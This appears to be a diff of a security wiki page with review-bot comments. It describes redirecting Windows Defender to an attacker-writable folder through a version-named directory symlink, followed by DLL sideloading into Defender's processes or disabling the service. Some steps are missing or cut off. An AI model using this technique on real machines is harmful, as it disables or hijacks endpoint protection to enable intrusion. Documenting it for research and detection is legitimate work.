It selects the subfolder with the highest lexicographic version string (e.g., `4.18.25070.5-0`), then starts the Defender service processes from there (updating service/registry paths accordingly). This selection trusts directory entries including directory reparse points (symlinks). An administrator can leverage this to redirect Defender to an attacker-writable path and achieve DLL sideloading or service disruption.
Preconditions
- Local Administrator (needed to create directories/symlinks under the Platform folder)
- Ability to reboot or trigger Defender platform re-selection (service restart on boot)
- Only built-in tools required (mklink)
Why it works
- Defender blocks writes in its own folders, but its platform selection trusts directory entries and picks the lexicographically highest version without validating that the target resolves to a protected/trusted path.
Step-by-step (example)
1) Prepare a writable clone of the current platform folder, e.g. `C:\TMP\AV`:
```cmd
set SRC="C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25070.5-0"
set DST="C:\TMP\AV"
robocopy %SRC% %DST% /MIR
```
2) Create a higher-version directory symlink inside Platform pointing to your folder:
4) Verify MsMpEng.exe (WinDefend) runs from the redirected path:
```powershell
Get-Process MsMpEng | Select-Object Id,Path
# or
wmic process where name='MsMpEng.exe' get ProcessId,ExecutablePath
```
You should observe the new process path under `C:\TMP\AV\` and the service configuration/registry reflecting that location.
Post-exploitation options
- DLL sideloading/code execution: Drop/replace DLLs that Defender loads from its application directory to execute code in Defender’s processes. See the section above: [DLL Sideloading & Proxying](#dll-sideloading--proxying).
- Service kill/denial: Remove the version-symlink so on next start the configured path doesn’t resolve and Defender fails to start:
> Note that This technique does not provide privilege escalation by itself; it requires admin rights.
## References
-[Unit42 – New Infection Chain and ConfuserEx-Based Obfuscation for DarkCloud Stealer](https://unit42.paloaltonetworks.com/new-darkcloud-stealer-infection-chain/)
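Review bot: the verification block in step 4 falls back to `wmic`, which Microsoft has deprecated and which is no longer installed by default on the newest Windows 11 builds, so the "# or" alternative will fail on exactly the systems where a reader is most likely to check; suggest replacing it with the CIM equivalent, `Get-CimInstance Win32_Process -Filter "Name='MsMpEng.exe'" | Select-Object ProcessId,ExecutablePath`, which works wherever the `Get-Process` line does. Since the "Why it works" bullet already states that platform selection trusts reparse points without validating the resolved path, the same verification step is the natural place to name the defender-side observable: an `MsMpEng.exe` whose executable path resolves outside the Platform folder, or a directory symlink appearing under Platform, is what this technique leaves behind, and a one-line detection hint there would make the section useful beyond reproduction. Minor style point in the closing note: "Note that This technique" should read "Note that this technique".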
@@ -940,6 +988,8 @@ References for PPL and tooling
-[Sysinternals – Process Monitor](https://learn.microsoft.com/sysinternals/downloads/procmon)
-[Zero Salarium – Countering EDRs With The Backing Of Protected Process Light (PPL)](https://www.zerosalarium.com/2025/08/countering-edrs-with-backing-of-ppl-protection.html)
-[Zero Salarium – Break The Protective Shell Of Windows Defender With The Folder Redirect Technique](https://www.zerosalarium.com/2025/09/Break-Protective-Shell-Windows-Defender-Folder-Redirect-Technique-Symlink.html)
-[Check Point Research – Under the Pure Curtain: From RAT to Builder to Coder](https://research.checkpoint.com/2025/under-the-pure-curtain-from-rat-to-builder-to-coder/)
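Review bot: the Zero Salarium folder-redirect post added here is the source the new section is built on, yet the section body never links to it; cite it inline where the technique is introduced so readers can check the original claims rather than discovering the source only at the bottom of the page. The Check Point "Under the Pure Curtain" entry is being added under the "References for PPL and tooling" heading, but its title concerns a RAT and builder, not PPL or the Defender platform-folder redirect, and nothing in this hunk cites it; either state which part of the page it supports or move it to the section it actually belongs to.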